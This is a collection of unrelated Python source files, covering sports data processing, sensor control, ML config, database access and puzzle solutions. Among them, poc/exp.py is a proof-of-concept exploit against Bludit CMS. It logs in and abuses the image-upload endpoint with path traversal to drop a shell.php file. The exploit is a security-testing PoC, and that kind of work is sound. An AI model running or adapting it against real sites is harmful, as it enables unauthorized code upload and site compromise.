chunk.size\n self.range_iter_cache.save(it,\n new_row_start, new_row_start + chunk_len, columns, filters)\n return chunk\n # if we are here, stream has ended, forget about iterator and\n # return empty chunk\n if in_cache:\n self.range_iter_cache.forget(it)\n return NumpyChunk(0, self.get_dtype())\n def 
get_dtype(self):\n        return np.dtype(list(col.get_dtype() for col in self.columns))\n    def select_columns(self, *columns):\n        # verify that at least 1 column is specified\n        if len(columns) == 0:\n            return self\n        # column objects or indices are accepted\n        if isinstance(columns[0], int):\n            col_indexes = tuple(columns)\n        else:\n            col_indexes = tuple(col.index for col in columns)\n        # if all columns are selected in the same order, return self...\n        if col_indexes == tuple(range(len(self.columns))):\n            return self\n        # compute a substream\n        return self.__select_columns__(*col_indexes)\n    def filter(self, cond):\n        col, comp_op, other = cond\n        # column object or index are accepted\n        if isinstance(col, int):\n            col_index = col\n        else:\n            col_index = col.index\n        # compute a substream\n        return self.__filter__(col_index, comp_op, other)\n","sub_path":"sakura/daemon/processing/streams/output/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"436425658","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom selenium import webdriver\nimport requests\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef login(host):\n    firefox_opt = webdriver.FirefoxOptions()\n    firefox_opt.add_argument(\"--headless\")\n    #firefox_binary = FirefoxBinary('/usr/local/bin/geckodriver')\n    \n    #driver = webdriver.Firefox(firefox_binary=firefox_binary)\n    driver = webdriver.Firefox(firefox_options=firefox_opt)\n    url = host + '/admin'\n    driver.get(url)\n    cookie = driver.get_cookies()\n    cookie_h = cookie[0]['name']\n    cookie_b = cookie[0]['value'] \n    driver.find_element_by_id(\"jsusername\").clear()\n    driver.find_element_by_id(\"jsusername\").send_keys(\"cuc\")\n    driver.find_element_by_id(\"jspassword\").clear()\n    driver.find_element_by_id(\"jspassword\").send_keys(\"111111\")\n    driver.find_element_by_xpath(\n        '//div[@class=\"form-group mt-4\"]/button[@class=\"btn btn-primary btn-lg mr-2 w-100\"]').click() # click the login button\n    driver.find_element_by_xpath('/html/body/div[3]/div/div[1]/ul/li[4]/a').click() # click \"write article\" (new content)\n    csrftoken = driver.find_element_by_xpath('//*[@id=\"jstokenCSRF\"]')\n    ctoken = csrftoken.get_attribute('value')\n    user_agent = driver.execute_script(\"return navigator.userAgent;\")\n    return ctoken, cookie_b,user_agent\n\ndef exp(host, token, cookie_b,user_agent):\n    cookies = {\n        'BLUDIT-KEY': cookie_b\n    }\n    headers = {\n        'User-Agent':user_agent ,\n        'Content-Type': 'multipart/form-data; boundary=--------327107347321150223463725464476',\n        'Origin': host,\n        'Referer': host + '/admin/new-content',\n    }\n    data = '----------327107347321150223463725464476\\n' \\\n        + 'Content-Disposition: form-data; name=\"images[]\"; filename=\"shell.php\"\\n' \\\n        + 'Content-Type: image/jpeg\\n' \\\n        + '\\n' \\\n        + 'hello \\n' \\\n        + '----------327107347321150223463725464476\\n' \\\n        + 'Content-Disposition: form-data; name=\"uuid\"\\n' \\\n        + '\\n' \\\n        + '../../tmp' \\\n        + '\\n' \\\n        + '----------327107347321150223463725464476\\n' \\\n        + 'Content-Disposition: form-data; name=\"tokenCSRF\"\\n' \\\n        + '\\n' \\\n        + '{csrftoken}\\n'.format(csrftoken=token) \\\n        + '----------327107347321150223463725464476--\\n'\n\n    # first POST the crafted multipart body to Bludit's image-upload endpoint;\n    # the traversal in the uuid field drops shell.php into /bl-content/tmp/\n    requests.post(host + '/admin/ajax/upload-images', headers=headers, data=data, cookies=cookies)\n    # then fetch the dropped file to verify the upload succeeded\n    response = requests.get(host + '/bl-content/tmp/shell.php', 
headers=headers, data=data, cookies=cookies)\n if \"hello\" in response.text:\n print(\"Poc Success!\")\n else:\n print(\"Poc failed!\") \n \n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: exp.py blog_host')\n exit(0)\n h = sys.argv[1]\n tup = login(h)\n token = tup[0]\n cookie_b = tup[1]\n user_agent = tup[2]\n exp(h, token, cookie_b,user_agent)\n","sub_path":"poc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598075404","text":"_base_ = ['mmcls::mobilenet_v2/mobilenet-v2_8xb32_in1k.py']\n\nstudent = _base_.model\n\nteacher_ckpt = 'https://download.openmmlab.com/mmclassification/v0/resnet/resnet50_8xb32_in1k_20210831-ea4938fc.pth' # noqa: E501\n\nmodel = dict(\n _scope_='mmrazor',\n _delete_=True,\n type='SingleTeacherDistill',\n data_preprocessor=dict(\n type='ImgDataPreprocessor',\n # RGB format normalization parameters\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n # convert image from BGR to RGB\n bgr_to_rgb=True),\n architecture=student,\n teacher=dict(\n cfg_path='mmcls::resnet/resnet50_8xb32_in1k.py', pretrained=False),\n teacher_ckpt=teacher_ckpt,\n distiller=dict(\n type='ConfigurableDistiller',\n student_recorders=dict(\n fc=dict(type='ModuleOutputs', source='head.fc')),\n teacher_recorders=dict(\n fc=dict(type='ModuleOutputs', source='head.fc')),\n distill_losses=dict(\n loss_kl=dict(type='KLDivergence', tau=1, loss_weight=3)),\n loss_forward_mappings=dict(\n loss_kl=dict(\n preds_S=dict(from_student=True, recorder='fc'),\n preds_T=dict(from_student=False, recorder='fc')))))\n\nfind_unused_parameters = True\n\nval_cfg = dict(_delete_=True, type='mmrazor.SingleTeacherDistillValLoop')\n","sub_path":"cv/distiller/CWD/pytorch/mmrazor/configs/distill/mmcls/kd/kd_logits_resnet50_mobilenet-v2_8xb32_in1k.py","file_name":"kd_logits_resnet50_mobilenet-v2_8xb32_in1k.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66147475","text":"\"\"\"\n\nWhich players are on the court?\n\n\"\"\"\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\nimport credentials\nimport warnings\n\ndef get_starting_lineup(quarter_df, quarter_players_df):\n\t\"\"\"\n\tReturns dataframe of the 10 players on the court for start of every quarter in play by play data\n\t\n\t:param quarter_df: general play by play NBA data subset to one quarter of one event_id\n\t:type quarter_df: pandas dataframe\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t\"\"\"\t\n\tstarters_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\tif quarter_df['period'].iloc[0] == 1:\n\t\tstarters_df = quarter_players_df.loc[quarter_players_df['play_event_id']==0][['event_id', 'play_id', 'player_id']].astype(int)\n\telse: \n\t\t#get all players who played at all during the quarter\n\t\tall_players = quarter_players_df['player_id'].dropna().unique().tolist()\n\t\tstarters=[]\n\t\tnon_starters=[]\n\t\t#get all of the subs made in the quarter\n\t\tall_subs_df = quarter_players_df.loc[quarter_players_df['play_event_id']==10][['event_id','player_id','play_id','sequence']]\t\n\t\tall_subs_dict = all_subs_df.to_dict('records')\n\t\t#from the first sub in the quarter, depending on which player was subbed in vs out, we can figure out 
who started\n\t\tfor play in all_subs_dict:\n\t\t\t#this is in the case the same player is subbed in/out twice before one of the other starters\n\t\t\t#import pdb; pdb.set_trace()\n\t\t\tif play['player_id'] not in starters and play['player_id'] not in non_starters:\n\t\t\t\tall_players = [player for player in all_players if player != play['player_id']]\n\t\t\t\tif play['sequence'] == 1:\n\t\t\t\t\tnon_starters.append(play['player_id'])\n\t\t\t\telif play['sequence'] == 2:\n\t\t\t\t\tstarters.append(play['player_id'])\n\t\t\t#if len(starters) == 10:\n\t\t\t\t#break\n\t\tif len(starters) != 10:\n\t\t\t#this next line is for players that played an entire quarter without being subbed. Steph sometimes does this\n\t\t\tstarters.extend(all_players)\n\t\t\tif len(starters) > 10:\n\t\t\t\twarning_message = \"WARNING: STARTING LINEUP IS GREATER THAN 10 FOR GAME: \"+ str(play['event_id']) + \" QUARTER: \" + str(quarter_df['period'].iloc[0]) + \". Best guess starters applied.\"\n\t\t\t\twarnings.warn(warning_message)\n\t\t\t\tstarters = best_guess_starters(quarter_players_df, all_players, starters, non_starters)\n\t\t\telif len(starters) < 10:\n\t\t\t\twarning_message = \"WARNING: STARTING LINEUP IS LESS THAN 10 FOR GAME: \"+ str(play['event_id']) + \" QUARTER: \" + str(quarter_df['period'].iloc[0]) \n\t\t\t\twarnings.warn(warning_message)\n\t\tstarting_info = quarter_df.loc[quarter_df['play_event_id']==14]\n\n\t\tfor starter in starters:\n\t\t\tnew_starter = {'event_id':int(starting_info['event_id']), 'play_id':int(starting_info['play_id']), 'player_id':starter}\n\t\t\tstarters_df = starters_df.append(new_starter, ignore_index=True)\n\tstarters_df=starters_df.astype(int)\n\treturn(starters_df)\n\ndef get_active_players(quarter_df, quarter_players_df, starters_df):\n\t\"\"\"\n\tReturns dataframe of the 10 players on the court for every play in play by play data\n\t\n\t:param quarter_df: general play by play NBA data subset to one quarter of one event_id\n\t:type quarter_df: pandas dataframe\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t:param starters_df: dataframe containing players that started the quarter on the court\n\t:type starters_df: pandas dataframe \t\n\n\t\"\"\"\t\n\tpoc_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\tcurrent_players=starters_df\n\tpoc_df = pd.concat([poc_df, current_players], ignore_index=True)\n\tif quarter_df['period'].iloc[0] == 1:\n\t\tafter_starters = quarter_df.loc[quarter_df['play_event_id']!=0]\n\telse:\n\t\tafter_starters = quarter_df.loc[(quarter_df['play_event_id']!=0) & (quarter_df['play_event_id']!=14)]\n\tafter_starters = after_starters[['event_id','play_id','play_event_id']]\n\tq_dict = after_starters.to_dict('records')\n\tfor play in q_dict:\n\t\tif play['play_event_id'] != 10:\n\t\t\t#if it's not a substitution, the current players list doesn't change, so just update play_id\n\t\t\tcurrent_players['play_id'] = play['play_id']\n\t\telif play['play_event_id'] == 10:\n\t\t\t#if it is a substitution, we grab that play from the pbp_players_df and use sequence to find out who is in and who is out\n\t\t\tsub_df = quarter_players_df.loc[(quarter_players_df['event_id']==play['event_id']) & (quarter_players_df['play_id']==play['play_id'])]\n\t\t\tnew_player_id = int(sub_df.loc[sub_df['sequence']==1]['player_id'].iloc[0])\n\t\t\tnew_player = {'event_id':play['event_id'], 'play_id':play['play_id'], 
'player_id':new_player_id}\n\t\t\tcurrent_players = current_players.append(new_player, ignore_index=True)\t\n\t\t\t#remove player from active_players\n\t\t\tremove_player_id = int(sub_df[sub_df['sequence']==2]['player_id'].iloc[0])\n\t\t\tcurrent_players = current_players[current_players.player_id != remove_player_id]\n\t\t\tcurrent_players['play_id'] = play['play_id']\n\t\tpoc_df = pd.concat([poc_df, current_players], ignore_index=True)\n\treturn(poc_df)\t\n\ndef best_guess_starters(quarter_players_df, all_players, starters, non_starters):\n\t\"\"\"\n\tThis function was made necessary by T.J Warren! In the 4th quarter of the game vs the Rockets on 2017/11/16,\n\tMr. Warren, while residing on the bench since the 3rd quarter, got a technical foul. Mr. Warren remained on the bench for \n\tthe rest of the game. T.J Warren appeared on the play-by-play log without playing a single minute in the quarter. In \n\tother words, T.J Warren is a true playmaker wherever he is in the gym.\n\t\n\tMakes a best guess on which unaccounted-for player should be considered a starter\n\n\t:param quarter_players_df: play by play data with player information subset to game and quarter\n\t:type quarter_players_df: pandas dataframe\n\n\t:param all_players: list of all players who logged a play in the quarter\n\t:type all_players: list \n\n\t:param starters: list of players we have identified as starters\n\t:type starters: list\n\n\t:param non_starters: list of players we have identified as non-starters\n\t:type non_starters: list\n\n\t\"\"\"\n\t#all players not accounted for through subs\n\tnot_accounted_for = np.setdiff1d(all_players,non_starters)\n\t#get how many plays they were involved in\n\tplay_count = quarter_players_df['player_id'].value_counts()\n\tplay_count_dict = play_count.to_dict()\n\tplay_count_dict = {player:play_count[player] for player in not_accounted_for}\n\t#of the unaccounted-for players who showed up in the quarter, the one with the fewest plays is the candidate removed from the best-guess starting lineup\n\tremove_candidate = min(play_count_dict, key=play_count.get)\n\tbest_guess_starters = [player for player in starters if player != remove_candidate]\n\treturn(best_guess_starters)\n\n\ndef main():\n\n\n\tconn = \"mysql+pymysql://{0}:{1}@{2}/{3}\".format(credentials.dbuser, credentials.dbpass, credentials.dbhost, credentials.dbname)\n\n\tengine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\"\n                       .format(user=credentials.dbuser,\n                               pw=credentials.dbpass,\n                               db=credentials.dbname))\t\t\n\n\t#Due to starting lineups only being available for quarter 1, I will be treating Q1 differently than the rest\n\t#read in data\n\tfolder_path = sys.argv[1]\n\tpbp_file = sys.argv[2] \n\tpbp_players_file = sys.argv[3]\n\t#read in .xlsx files with pandas\n\tpbp_df = pd.read_excel(folder_path+pbp_file, header=0)\n\tpbp_players_df = pd.read_excel(folder_path+pbp_players_file, header=0)\n\n\tpbp_df.sort_values(by = ['event_id','play_id'], inplace = True)\n\tpbp_players_df.sort_values(by = ['event_id','play_id'], inplace = True)\n\t#make empty df to append to\n\ton_court_df = pd.DataFrame(columns = ['event_id','play_id', 'player_id'])\n\t#dealing with one game at a time\n\tgames=pbp_df.groupby('event_id')\n\tfor game in games.groups:\n\t\t\n\t\tthis_game=games.get_group(game)\n\t\t#deal with quarters individually\n\t\tquarters = this_game.groupby('period')\n\t\tfor quarter in quarters.groups:\n\t\t\t\n\t\t\tquarter_df = quarters.get_group(quarter)\n\t\t\t#making subset of 
pbp_players_df\n\t\t\tquarter_players_df = pbp_players_df.loc[(pbp_players_df['event_id']==game) & (pbp_players_df['period']==quarter)]\n\t\t\tstarters_df = get_starting_lineup(quarter_df, quarter_players_df)\n\t\t\tactive_players = get_active_players(quarter_df, quarter_players_df, starters_df)\n\t\t\ton_court_df = pd.concat([on_court_df, active_players], ignore_index=True)\n\ton_court_df.to_csv('/home/bealt/coding_projects/Swish_Analytics/Swish Analytics - Data Engineer Project/Swish Analytics - Data Engineer Project/on_court.csv', index=False)\n\n\ton_court_df.to_sql('pbp_players_on_court', con = engine, if_exists = 'append', chunksize = 1000)\n\tpbp_players_on_court = pd.read_sql_table('pbp_players_on_court', engine)\n\tpbp_players_on_court = pbp_players_on_court[['event_id', 'play_id', 'player_id']]\n\tpbp_players_on_court.to_csv('/home/bealt/coding_projects/Swish_Analytics/Swish Analytics - Data Engineer Project/Swish Analytics - Data Engineer Project/on_court.csv', index=False) \n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"pbp.py","file_name":"pbp.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"603336581","text":"import RPi.GPIO as GPIO # use the RPi.GPIO module under the name GPIO\r\nimport time # use the time functions\r\n\r\nLED=21 # LED connected to GPIO 21\r\nGPIO.setmode(GPIO.BCM) # use BCM pin numbering\r\nGPIO_TRIGGER=26 # HC-SR04 trigger pin connected to GPIO 26\r\nGPIO_ECHO=19 # echo pin connected to GPIO 19\r\nprint (\"Ultrasonic Distance Measurement\") # print the banner string\r\n\r\nGPIO.setup(GPIO_TRIGGER,GPIO.OUT) # trigger pin (emits the ultrasonic pulse) in output mode\r\nGPIO.setup(GPIO_ECHO,GPIO.IN) # echo pin (receives the reflected pulse) in input mode\r\nGPIO.setup(LED,GPIO.OUT) # LED that is switched on/off on detection, in output mode\r\n\r\ntry: # run the statements in this block\r\n    while True: # the condition is always True, so the body repeats forever\r\n        stop = 0 # initialize stop to 0\r\n        start = 0 # initialize start to 0\r\n        GPIO.output(GPIO_TRIGGER, False) # first hold the trigger pin OFF\r\n        time.sleep(2) # pause for 2 seconds\r\n        GPIO.output(GPIO_TRIGGER, True) # emit a 10 us pulse\r\n        time.sleep(0.00001) # pause for 0.00001 seconds\r\n        GPIO.output(GPIO_TRIGGER, False) # set the trigger pin back to OFF\r\n\r\n        while GPIO.input(GPIO_ECHO)==0: # the moment the echo pin turns ON is the start time\r\n            start = time.clock() # measure and store the start time\r\n        while GPIO.input(GPIO_ECHO)==1: # the moment the echo pin turns OFF again is the reception time\r\n            stop = time.clock() # measure and store the reception time\r\n        duration = stop-start #Calculate pulse length \r\n        if (stop and start): # only proceed if both stop and start were set\r\n            distance = duration * 17000 # speed of sound taken as 340 m/s; the pulse travels there and back, so halve it (34000/2 = 17000)\r\n            print(\"Distance : %.1f cm\" %distance) # print the distance computed above\r\n            if distance >= 10: # if distance is 10 cm or more, run the following\r\n                GPIO.output(LED,True) # drive the LED HIGH (1) = LED on\r\n            else: # otherwise (distance below 10 cm) run the following\r\n                GPIO.output(LED,False) # drive the LED LOW (0) = LED off\r\nexcept KeyboardInterrupt: # on a KeyboardInterrupt (Ctrl-C), run the following\r\n    print (\"Ultrasonic Distance Measurement End\") # print the closing banner\r\n    GPIO.cleanup() # reset the GPIO pins\r\n","sub_path":"김예진/7_2/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"261153353","text":"\"\"\"\nSettings of integrated third-party authentication libraries.\n\nhttps://github.com/pennersr/django-allauth\nhttps://github.com/Tivix/django-rest-auth\nhttp://getblimp.github.io/django-rest-framework-jwt/\n\"\"\"\n\n\n# 
django-allauth\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = False\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nLOGIN_REDIRECT_URL = 'http://localhost:8000'\nSITE_ID = 1\n","sub_path":"{{cookiecutter.project_name}}/{{cookiecutter.project_name}}/settings/integrations/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347725138","text":"from Database_Objects import regression\nfrom Database_Objects.match import dotaMatch, matchAttributes\nfrom Database_Objects.team import teamAttributes\nfrom Database_Objects.league import league, leagueAttributes\nfrom Database_Objects.player import player, playerAttributes\nfrom Database_Objects.team import team, teamAttributes\n\nfrom pymongo import MongoClient\nimport os\nfrom enum import Enum\n\nclass DatabaseConnector():\n\n \n def __init__(self, mongoString):\n self.client = MongoClient(mongoString)\n self.db = self.client.Dota2ProMatches\n\n def getServerStatus(self):\n return(self.db.command(\"serverStatus\"))\n\n # obj is the data, cName is the collection to add the document to.\n # true if operation worked, otherwise false\n def insertMany(self, data, cName):\n if(cName not in databaseCollections):\n return False\n if(data is None):\n return False\n try:\n if( cName.value == \"Players\"):\n self.db.Players.insert_many(data)\n elif( cName.value == \"Matches\"):\n self.db.Matches.insert_many(data)\n elif( cName.value == \"Teams\"):\n self.db.Teams.insert_many(data)\n elif( cName.value == \"Leagues\"):\n self.db.Leagues.insert_many(data)\n elif( cName.value == \"Regressions\"):\n self.db.Regressions.insert_many(data)\n else:\n return False\n return True\n except Exception as e:\n print(e)\n return False\n\n # takes a query which is a dictionary using mongo syntax and a database Collection to look in\n def makeQuery(self, query, dbc):\n if(dbc == databaseCollections.LEAGUES):\n return self.db.Leagues.find(query)\n elif(dbc == databaseCollections.TEAMS):\n return self.db.Teams.find(query)\n elif(dbc == databaseCollections.PLAYERS):\n return self.db.Players.find(query)\n elif(dbc == databaseCollections.HEROES):\n return self.db.Heroes.find(query)\n elif(dbc == databaseCollections.MATCHES):\n return self.db.Matches.find(query)\n elif(dbc == databaseCollections.REGRESSIONS):\n return self.db.Regressions.find(query)\n\n\n def getDocumentsByAttribute(self, value, attribute):\n returnable = []\n if(attribute in leagueAttributes):\n results = self.db.Leagues.find({attribute.value: value})\n for iterable in results:\n returnable.append(league.from_dict(iterable))\n elif(attribute in playerAttributes):\n results = self.db.Players.find({attribute.value: value})\n for iterable in results:\n returnable.append(player.fromDict(iterable))\n elif(attribute in teamAttributes):\n results = self.db.Teams.find({attribute.value: value})\n for iterable in results:\n returnable.append(team.fromDict(iterable))\n elif(attribute in matchAttributes):\n results = self.db.Matches.find({attribute.value: value})\n for iterable in results:\n returnable.append(dotaMatch.fromDict(iterable))\n elif(attribute in regression.regressionAttributes):\n results = self.db.Regressions.find({attribute.value: 
value})\n            for iterable in results:\n                returnable.append(dotaMatch.fromDict(iterable))\n        return returnable\n\nclass databaseCollections(Enum):\n    PLAYERS = 'Players'\n    MATCHES = 'Matches'\n    TEAMS = 'Teams'\n    LEAGUES = 'Leagues'\n    HEROES = 'Heroes'\n    REGRESSIONS = 'Regressions'","sub_path":"DatabaseConnector.py","file_name":"DatabaseConnector.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"455725788","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/fileinfo/plugins/fileinfo_inv_plugin_jove_pdf.py\n# Compiled at: 2008-11-14 05:28:41\n\"\"\"A fileinfo plug-in for accessing the JHOVE file validator.\n\nYou need to set the variable 'jhoveHome' to the path of the JHOVE \ninstallation directory on your system, if you want to use this \nplug-in. This is very experimental...\n\nSee also: \n\n    http://hul.harvard.edu/jhove\n\"\"\"\nimport re, sys, os.path\nfrom os import popen\nfrom fileinfo.investigator import BaseInvestigator\njhoveHome = '/Applications/Added/jhove'\n\nclass JhovePdfInvestigator(BaseInvestigator):\n    \"\"\"A class for validating PDF files using Jhove.\"\"\"\n    __module__ = __name__\n    attrMap = {'status': 'getstatus', 'errmsg': 'geterrmsg', 'errmsgext': 'geterrmsgext'}\n    totals = ()\n\n    def activate(self):\n        \"\"\"Try activating self, setting 'active' variable.\"\"\"\n        if os.path.exists(jhoveHome):\n            format = '%s/jhove -c %s/conf/jhove.conf -m pdf-hul -k %s'\n            cmd = format % (jhoveHome, jhoveHome, self.path)\n            self.jhoveOutput = popen(cmd).read()\n            self.active = True\n        else:\n            self.active = False\n        return self.active\n\n    def getstatus(self):\n        \"\"\"Return Jhove status.\"\"\"\n        m = re.search('^\\\\s*Status:\\\\s*(.*)$', self.jhoveOutput, re.M)\n        if m:\n            output = m.groups()[0]\n        else:\n            output = 'n/a'\n        return output\n\n    def geterrmsg(self):\n        \"\"\"Return Jhove error message.\"\"\"\n        m = re.search('^\\\\s*ErrorMessage:\\\\s*(.*)$', self.jhoveOutput, re.M)\n        if m:\n            output = m.groups()[0]\n        else:\n            output = 'n/a'\n        return output\n\n    def geterrmsgext(self):\n        \"\"\"Return Jhove extended error message.\"\"\"\n        m = re.search('^\\\\s* ErrorMessage:\\\\s*([\\\\w ]+)\\\\s+(Offset:\\\\s+\\\\d+)$', self.jhoveOutput, re.M)\n        if m:\n            output = '%s (%s)' % m.groups()\n        else:\n            m = re.search('^\\\\s*ErrorMessage:\\\\s*(.*)$', self.jhoveOutput, re.M)\n            if m:\n                output = m.groups()[0]\n            else:\n                output = 'n/a'\n        return output.replace('dictionary', 'dict.')","sub_path":"pycfiles/fileinfo-0.3.3-py2.4/fileinfo_inv_plugin_jove_pdf.py","file_name":"fileinfo_inv_plugin_jove_pdf.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"651351084","text":"import tweepy\r\nimport datetime\r\nimport csv\r\nimport twconfig\r\ndef gettwitterdata(keyword,dfile,sincedate,untildate):\r\n    \r\n    # authentication credentials\r\n    CK = twconfig.CONSUMER_KEY\r\n    CS = twconfig.CONSUMER_SECRET\r\n    AT = twconfig.ACCESS_TOKEN\r\n    ATS = twconfig.ACCESS_TOKEN_SECRET\r\n    auth = tweepy.OAuthHandler(CK, CS)\r\n    auth.set_access_token(AT, ATS)\r\n    \r\n    api = tweepy.API(auth)\r\n    \r\n    # set the search keyword \r\n    q = keyword\r\n    \r\n    # list to store the tweets\r\n    tweets_data =[]\r\n    \r\n    # fetch data using a cursor\r\n    for tweet in tweepy.Cursor(api.search, \r\n                               q=q, \r\n                               count=100,\r\n                               tweet_mode='extended',\r\n                               lang='ja',\r\n                               
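# tweet_mode='extended' above makes the API return untruncated tweets,\r\n                               # which tweepy exposes as tweet.full_text (used below) instead of tweet.text\r\n                               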
since=sincedate+'_00:00:00_JST', \r\n                               until=untildate+'_23:59:59_JST'\r\n                               ).items():\r\n        \r\n        # grab the full tweet text\r\n        tweets_data.append([tweet.user.screen_name,\r\n                            tweet.created_at + datetime.timedelta(hours=9),\r\n                            tweet.full_text.replace('\\n',''),\r\n                            tweet.favorite_count,\r\n                            tweet.retweet_count])\r\n        \r\n    #print(sincedate+'_00:00:00_JST')\r\n    #print(untildate+'_00:00:00_JST')\r\n    \r\n    # output file name\r\n    fname = r\"'\"+ dfile + \"'\"\r\n    fname = fname.replace(\"'\",\"\")\r\n    \r\n    # write the file\r\n    with open(fname, \"w\",newline='',encoding=\"utf-8\") as f:\r\n        writer = csv.writer(f, lineterminator='\\n')\r\n        writer.writerow([\"id\",\"created_at\",\"text\",\"fav\",\"RT\"])\r\n        writer.writerows(tweets_data)\r\n        f.close()\r\n\r\nif __name__ == '__main__':\r\n\r\n    # enter the search keyword; to exclude retweets, enter \"keyword -RT\"\r\n    print ('====== Enter Search KeyWord =====')\r\n    keyword = input('> ')\r\n\r\n    # enter the output file name (relative or absolute path)\r\n    print ('====== Enter Tweet Data file =====')\r\n    dfile = input('> ')\r\n\r\n    # start of the search period\r\n    print ('====== Search period start (yyyy-mm-dd) =====')\r\n    sincedate = input('> ')\r\n\r\n    # end of the search period\r\n    print ('====== Search period end (yyyy-mm-dd) =====')\r\n    untildate = input('> ')\r\n\r\n    gettwitterdata(keyword,dfile,sincedate,untildate)","sub_path":"correct_data/searchtw.py","file_name":"searchtw.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"376186574","text":"#!/usr/bin/env python\n\"\"\"\n--- Day 10: Monitoring Station ---\nhttps://adventofcode.com/2019/day/10\n\nRank: 1335 / 1136\n\"\"\"\nimport functools\nimport math\nfrom typing import Dict, Generator, Set, Tuple\n\nfrom aocutils import Point, read_input, timer\n\nINPUT = [list(line) for line in read_input('10')]\nASTEROIDS = {\n    Point(x_coord, y_coord) for y_coord, line in enumerate(INPUT) for x_coord, val in enumerate(line) if val == '#'\n}\n\n\ndef normalize_vector_int(point_a: Point, point_b: Point) -> Point:\n    \"\"\"Get the vector from point_a to point_b normalized to the lowest int possible (gcd).\"\"\"\n    vector_x = int(point_b.x - point_a.x)\n    vector_y = int(point_b.y - point_a.y)\n    gcd = math.gcd(vector_x, vector_y)\n    return Point(vector_x // gcd, vector_y // gcd)\n\n\ndef get_detected_asteroids(asteroids: Set[Point], origin: Point) -> Set[Point]:\n    \"\"\"Get the detected asteroids from a given position.\"\"\"\n    vector_asteroids: Dict[Point, Set[Tuple[Point, float]]] = dict()\n    for asteroid in asteroids:\n        if asteroid == origin:\n            continue\n        vector = normalize_vector_int(origin, asteroid)\n        if vector not in vector_asteroids:\n            vector_asteroids[vector] = set()\n        vector_asteroids[vector].add((asteroid, origin.distance(asteroid)))\n    return {min(possible_asts, key=lambda k: k[1])[0] for possible_asts in vector_asteroids.values()}\n\n\n@functools.lru_cache(maxsize=1)\ndef best_location() -> Tuple[Point, int]:\n    \"\"\"Get the coordinates of the best position for the monitoring station.\"\"\"\n    detected_per_asteroid = {asteroid: len(get_detected_asteroids(ASTEROIDS, asteroid)) for asteroid in ASTEROIDS}\n    best_pos = max(detected_per_asteroid, key=detected_per_asteroid.get)\n    return best_pos, detected_per_asteroid[best_pos]\n\n\ndef order_asteroids(origin: Point, asteroids: Set[Point]) -> Generator:\n    \"\"\"Get the detected asteroids ordered given an origin.\"\"\"\n    vector_asteroids = list()\n    for asteroid in asteroids:\n        vector = normalize_vector_int(origin, asteroid)\n        declive = -math.inf if vector.x == 0 else vector.y / vector.x\n        
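# slope alone cannot order a full revolution, so after the sort below the\n        # four quadrant loops emit asteroids clockwise starting from straight up\n        # (vector.y < 0 points up, since grid y grows downward); vectors are\n        # already gcd-reduced by normalize_vector_int, e.g. (4, -2) -> (2, -1)\n        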
